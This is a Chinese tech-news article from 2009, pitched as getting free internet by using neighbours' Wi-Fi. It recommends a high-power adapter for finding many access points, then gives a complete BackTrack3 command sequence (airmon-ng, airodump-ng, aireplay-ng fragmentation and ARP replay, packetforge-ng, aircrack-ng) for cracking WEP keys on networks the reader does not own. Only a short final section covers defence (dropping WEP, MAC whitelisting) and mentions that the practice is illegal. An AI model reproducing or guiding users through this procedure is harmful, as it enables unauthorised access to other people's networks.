科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道上网不花钱?无线网络蹭网技术揭秘

上网不花钱?无线网络蹭网技术揭秘

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

随着互联网的发展,无线网络的应用越来越广泛,很多商场、酒店已经开始提供无线上网服务。对于个人用户来说。

作者:中关村在线 来源:中关村在线 2009年7月13日

关键字: 密码 WiFi 无线网络

  • 评论
  • 分享微博
  • 分享邮件
  随着互联网的发展,无线网络的应用越来越广泛,很多商场、酒店已经开始提供无线上网服务。对于个人用户来说,接触无线最多的方式可能就是ADSL+无线路由器了,想必你的电脑也会搜索到很多其它接入点,这些接入点或者信号很低,或者已经加密,别人的无线网络,我们是否也能坐等享用呢?

     信号增强问题

     首先,我们必须让自己“蹭网”成功的概率高些。那么提高接入点数量就成了首要问题。一般情况下,笔记本内置的无线网卡在搜寻接入点时会偏弱于外部无线网卡,另外天线问题也是一个很关键的因素,我们来看看“蹭网”族使用的无线网卡。


上网不花钱?无线网络蹭网技术揭秘
卡皇实物

    在国内某家网站宣传的其“卡皇”产品,声称发射功率达500mw,是普通网卡的10倍,其可视传输距离为3600米,也就是半径3600米内的接入点都会被搜索到,不管该接入点是否加密。如果你住在居民区,那周围的写字楼,商场,批发市场,住宅小区,咖啡厅包含的接入点将和你家中无线路由器发出的无线信号一样,都被这款卡皇嗅探到。

上网不花钱?无线网络蹭网技术揭秘
外置天线

    我们来看看这款设备有何特殊之处:采用RTL8187L芯片,功率更强,信号接收多。完美支持BT3(这个后面会讲到),可外接天线,网上售价为260元,考虑到可以常年免费上网,这个价格也不算太离谱。

    搜索到无线信号以后,我们会发现大部分接入点都是加密的,接下来就需要配合软件方式破解密码,达到免费无线上网的目的。

BackTrack3(BT3)破解密码

  BackTrack是基于SLAX的自启动运行光盘,是基于linux发行版的系统。目前使用最多的是V3 Final版本,但这个版本对少数网卡支持存在一些问题,所以V3 Beta版本仍有部分人在使用。BackTrack集中了无线网络几乎能见到的安全和破解工具,可谓无线网络破解的百宝箱,全球各地的人使用它破解了无数的无线网络,从侧面促进了大众无线网络安全意识的迅速提高。


上网不花钱?无线网络蹭网技术揭秘
BackTrack3

    由于我们需要在BT3下破解,而使用的是Windows系统,所以需要在虚拟机下安装BT3CD版。安装系统类型选择Linux,空间需要大于4GB,具体安装过程与其他系统并无两样,下面主要讲解一下进入系统后的破解工作。

    打开终端窗口,输入以下命令(括号内为解释内容):

    ifconfig -a (查看无线网卡Mac地址)

    airmon-ng start wifi0 5

    (其中wifi0是电脑里面给无线网卡的,一般都是这个,用ifconfig -a命令可以看得到。wifi0 后面的5是需要破解AP频道,可以在左下角开始菜单里面,找到第二项Internet中的无线网工具,查看AP的频道Channel。然后会看到出现一个 Ath1,格式为XXX1样式)

    airodump-ng --ivs -w name -c 5 ath1  (5和ath1根据自己的结果修改)

    aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 (XX内容为MAC地址)

    aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1

    packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp (XX是网卡MAC地址,XXXXX-XXXXXX就是上次命令返回的文件名)

    aireplay-ng -2 -r mrarp -x 1024 ath1

    打开一个新的窗口,运行

    aircrack-ng -n 64 -b ap_mac name-XX.ivs(name-XX.ivs需要到桌面生成文件夹里查看,找到序号最大的那个)

    一般情况下,用不了太久,密码就会显示出来,当然只局限于破解WEP加密方式。

    防范与总结

    首先最好杜绝WEP加密方式,另外最好的办法就是在无线路由器上采取MAC绑定,对准入MAC进行白名单处理,不过这种方法不太适合公用场合的AP,但换一种加密方法还是比较容易的。

上网不花钱?无线网络蹭网技术揭秘
设置准入设备防止蹭网者连接无线网络

 

    对于无线破解来说并不复杂,掌握了基本的方法后破解效率觉得称得上高效,不过随着上网资费的下调,蹭网情况会越来越少,加之卡皇设备功率大,辐射也不容小视,并且从法律的角度也是不允许这种行为的。希望广大网友提高警惕,保护好自己的无线网络。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章